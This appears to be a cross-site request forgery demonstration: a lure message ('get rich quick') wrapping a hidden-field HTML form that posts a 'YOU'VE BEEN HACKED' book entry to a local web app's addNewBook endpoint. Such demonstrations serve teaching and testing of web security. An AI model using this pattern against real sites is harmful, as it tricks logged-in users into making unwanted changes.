Hey Rich, check out this great way to get rich quick:

<form method="post" action="http://localhost:8080/mywebapp/addNewBook.do">
	<input id="isbn" name="isbn" type="hidden" value="009192166X"/>	  
	<input id="title" name="title" type="hidden" value="!!!!!!!!!!!!YOU'VE BEEN HACKED!!!!!!!!!!!!!!!!!!!!!!!!!"/>
	<input id="author" name="author" type="hidden" value="Harold T. Hacker Esq"/>
	<input id="price" name="price" type="hidden" value="10.00"/>	
	<input type ="submit" value="Click here"/>
</form>